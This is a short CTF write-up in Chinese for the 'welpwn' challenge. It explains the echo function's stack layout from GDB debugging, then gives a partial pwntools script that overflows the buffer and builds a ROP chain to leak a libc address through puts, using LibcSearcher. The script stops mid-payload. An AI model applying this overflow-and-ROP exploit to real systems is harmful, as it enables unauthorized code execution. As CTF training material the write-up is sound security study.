使用LibcSearcher解法
使用GDB动态调试下,发现
0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧
0x7fffffffdb00开始就是属于main函数的栈帧
0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖
0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址
可以通过4个pop把rip往后移动0x7fffffffdb30处,我们可以在这里构造ROP链
# -*- coding: utf-8 -*-
# @Author: 夏了茶糜
# @Date: 2020-03-16 10:13:17
# @email: sxin0807@qq.com
# @Last Modified by: Administrator
# @Last Modified time: 2020-03-16 16:53:40
from pwn import *
from LibcSearcher import *
context(arch="amd64",os="linux",log_level="debug")
#p = process("./welpwn")
p = remote("111.198.29.45",32966)
elf = ELF("./welpwn")
write_got = elf.got['write']
puts_plt = elf.plt['puts']
start = elf.symbols['_start']
pop_4 = 0x40089C
pop_rdi = 0x4008a3
payload = 0x18 * b'a' + p64(pop_4) + p64(pop_rdi) + p64(write_got) + p64(puts_plt) + p64(